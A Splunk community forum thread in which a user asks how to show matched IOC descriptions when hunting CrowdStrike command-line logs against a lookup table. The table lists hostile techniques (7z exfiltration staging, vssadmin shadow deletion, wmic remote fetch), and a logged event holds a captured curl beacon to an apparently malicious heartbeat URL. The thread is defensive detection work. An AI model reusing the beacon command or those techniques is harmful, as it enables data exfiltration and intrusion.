topic Displaying matching command strings from lookup table in Splunk Search

Displaying matching command strings from lookup table

cybersunny — Tue, 14 May 2024 21:53:59 GMT

All -

I am new to Splunk and trying to figure out a way to return a matched command from a CSV table with inputlookup. I have ioc_check table containing command strings and description as below:

commands	description
7z a -t7z -r	Compress data for exfiltration
vssadmin.*	Delete Shadows Deletion of Shadow copy
wmicprocesscallcreate*	Uses WMI to create processes
wmicgethttp	Using wmic to get and run files from internet

I am using this lookup table commands string against CrowdStrike CommandLine to hunt for any matches commands run by any user in our environment. So when the CommandLine filed from CrowdStrike logs matches any commands string from lookup table, it should generate an alert. What we are trying to achieve is when there is an alert it should also tell us the description of the matching command so we know which command matched with the CrowdStrike CommandLine. The final result should be like this:

CommandLine	description	commands
curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d	Using wmic to get and run files from internet	wmicgethttp

I have come up with below search it gives me an alert but not able to display the matching command and description. Any help would be much appreciated!

Re: Displaying matching command strings from lookup table

ITWhisperer — Tue, 14 May 2024 14:41:14 GMT

To use wildcards in lookups they have to be defined as match type WILDCARD

https://docs.splunk.com/Documentation/Splunk/9.2.1/Knowledge/Usefieldlookupstoaddinformationtoyourevents#Create_a_CSV_lookup_definition

Re: Displaying matching command strings from lookup table

cybersunny — Tue, 14 May 2024 14:52:39 GMT

I tried with lookup definition "WILDCARD(commands)" but that didn't work!

Re: Displaying matching command strings from lookup table

ITWhisperer — Tue, 14 May 2024 15:38:23 GMT

Please share the event which was supposed to have matched and the entry in the lookup that it should have matched to

Re: Displaying matching command strings from lookup table

cybersunny — Tue, 14 May 2024 16:14:49 GMT

Here is the event:
{"ChangeTime":"159019401599.660","CapPrm":"274877906943","ParentProcessId":"41312874540918","SourceProcessId":"41312874540918","aip":"167.8.84.8","SessionProcessId":"41312874540918","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1715545935.034","SVUID":"0","EventOrigin":"1","id":"92d99f91-6970-4f66-a38a-762e6b2af7b9","EffectiveTransmissionClass":"2","Tags":"12094627905582, 12094627906234","timestamp":"1715545919041","ProcessGroupId":"32517225337224","event_simpleName":"ProcessRollup2","RawProcessId":"17459","RootPath":"/","GID":"0","SVGID":"0","MD5HashData":"b194675c8ea858f2ed21214e9bbfc16b","SHA256HashData":"14ac73386c9ca706968f2ad2bd2a861f37659d669756e730fe2747d3b726f1da","UID":"0","CommandLine":"curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=IYtBsvtfYai1wFsAeUU1ad8hCB8fX2hRrPvM%2bfwQVOb30LoDJluceAyV5jg75J8bHbinyYONJqjAbsrxiZwsLcFKHE59NwzNLLBkZ88ZBNu%2bc%2bGO2WxnITbXkXZyQJkMbdXlnnAwJ602gWkuOhmsiw3Ft5c%2b4Tduq615Hllj4u5whtm9TQxay%2bOQy4mVeJ7tfurRODGqsHw6mlsjXSpmgNUA5cSDVkiuc1pCzMugiOur5Dh2XoG7ABj%2bfEjEBe33hjD6431XFaKA8YkUoLJ424pYBhiFc%2bSK7Xd1csiCYwK4jwO98E4%2f8vLn37nFw8a2Uwiy8lOeP1e1skwDMccJR7jhAndmIQtSL1GruLm9lUpGwt%2b%2bmm%2bwawKl6NEca%2bNLJeWq7EcnfpPsZzPkV9kpyPu8Pz2mrZy%2fkKoXUEoeP0IOg6sRDrYu4%2bDNhcLT3znS8OqBxi%2bZypOcnABSwamvRXP048qJHQx7pm7yPkMaG20VjGtP48RUNGM2jloRNtbgHfJW2D3BmRp2De8rNRp5fdnzKB0i%2fUfYQ%2fWbLxYoZ4LQv3YEvT6XssTi1yScdJj3miAD%2b9Q5y4R1%2fLKUO9BUIeKvf0Zm23k7BSiqznd2skvuqUo4gb6JPwPW4zpctCiAKwZlKDY4AbZe1gBkJJWrrv%2bJ8VJTP37W5fTFtsqqTEc8ziL40%2bvqes1NLAiSEN31ABppkOmgZtkPXrC42utxYLjeMC06Raic6iLmymZo%2f5UrD31SshEm5k6KvVdZ2Bf%2fsPPjsf8uXfzhTxDmvWgYcVAkbvsukaVBQcrvqxXd1zSKbgTWEO41uXWdPSNqZtHj2TubS%2flCikiJPYX1zMhjsFFvkGlPIyTz%2bgCvm3JzLlcVT%2fLWJ216l4ozrD0%2b2Gq4wHuUlE8zcHZo00Vo9ysmAqEQ8HoWVzr1ZRRY7Lfn%2bhS0V7Uvlt65JDEm%2bA3aRcwNDBiNjkYNrU3LfTnBdCKgE1b8qpzcwoJMuPNadSZLPa3gKP%2fLXWNN266rW%2f1bqg5exR%2bk8D2ipueAUYYuJlCvsyvvU%2bh%2fF6zyJzqKN8zpy1tWtpGPBzFEbxixjBozX3LfficGlz1hDuLEclKKpH8rpOHSwsXrHGX%2fEiN5NRx4tPyR%2bGWmPMXm94ZazpH153EW0ixtQNaJJBBkR1Jmave6xacXustk9Tz67EcB0cPY2cEL%2bKzTVm%2fv7mEJRO2ohkzGmfBYsncbzBB3CssQp%2fSNcOoX%2fFl%2bBKiA3YSGiOuLv4nPG84PkfOKwTd7irZF3evTl4GEg8Ajkm54fMf5kFY1v3fH3b9NfPwZDMlDKOCNMYJuhXmglCdI1FQsJiIlyPZVrY21YcmQgGfJT7Bau64wq%2bHfP2p9P1oyU4%2f3mkH3tkWb%2bL754Ss%2fIRl%2fFFY9rOHOt7kBphaFgB9JEaoxFTtIYy%2fT66BXmr957lKlBiJg08FYBYE1PR6%2bPwMiCftCu2tdU3HulvTGR1Exc4shovJAVgq6iwWYHmpZo%2bqRuM8cz1itutz%2b%2bm7ZQDlbaiU1%2bSvDGOgBU%2f423vojnbrHKb6hYQIS%2bGrSBUuJBeZHLiKOfkPfsFvNYZIcmD%2bRkNCgwf4nTooOIY5GffKGH0LOPeT8RZzOcytEBjyu9%2fMQVIonZMc73lavnz7uPCRtGiezB%2fjkFj5UkSplosXjlN%2fyQbfoR5RQhUcgVKQpoSGrSUeT%2bSRyrV5QBtDwHTykUIzAUu%2bUvC3Vfwe0Oz24TCTfRFm%2bKhHGEt7v9PB8NZ0oCzkMwR6VerNptlspoWGjr91j0OXB6hlxjDxOD%2bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http://wvcfg.wetmet.net/api/serverservice/heartbeat.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bj0%3d&version=Y9Ml9TL3Ayxy77SNYVWxkLuS7eHa4%2bBQxFHVCdAP%2f%2fw%3d","TargetProcessId":"43142923935709","ImageFileName":"/usr/bin/curl","RGID":"0","SourceThreadId":"0","RUID":"0","ProcessStartTime":"1715545934.678","aid":"42ab2efd409d492ba5f376f467370a44","cid":"09919f785a7e46ef8c53da25fbd9d186"}

It should match with this lookup entry:

wmic*get*http

Using wmic to get and run files from internet

It does matches but I am just not able to display command and description in my final result.

Thank you

Re: Displaying matching command strings from lookup table

ITWhisperer — Tue, 14 May 2024 16:46:27 GMT

If you change your lookup entry to

*wmic*get*http*

does it match?

Re: Displaying matching command strings from lookup table

cybersunny — Tue, 14 May 2024 17:07:50 GMT

Yes, it does matches, but I am struggling with displaying command and description in final result.

As per my logic above when I use the | table CommandLine, commands, description ---- it just displays CommandLine, and column commands, description comes as blank.

Re: Displaying matching command strings from lookup table

ITWhisperer — Tue, 14 May 2024 17:20:58 GMT

I am not sure I understand - if it matches, what gets returned?

Also, what permissions/scope do you have on you have on your lookup file and lookup definition? (Make sure they are accessible by all apps)

Re: Displaying matching command strings from lookup table

ITWhisperer — Tue, 14 May 2024 17:16:13 GMT

Re: Displaying matching command strings from lookup table

cybersunny — Tue, 14 May 2024 21:54:53 GMT

Hi -

To explain, we have ioc_check table with over 100 commands, we are matching this commands with CrowdStrike CommandLine as a hunting perspective. This is the SPL we have which alerts us when CommandLine matches with commands string from lookup table.

The results we are getting as:

CommandLine	commands	description
curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhW...

However, the result we want as this:

CommandLine	commands	description
curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhW...	wmicgethttp	Using wmic to get and run files from internet

Also, we have Global permissions to All apps for both Lookup table and definition.

Re: Displaying matching command strings from lookup table

ITWhisperer — Tue, 14 May 2024 22:24:31 GMT

The CommandLine example you have shown does not match the lookup wildcard string you have shown so it is not surprising that you don't get any results returned from the lookup.

Also, if the commands lookup field already contains leading and trailing * there should be no need to add them to the CommandLine filter in the subsearch.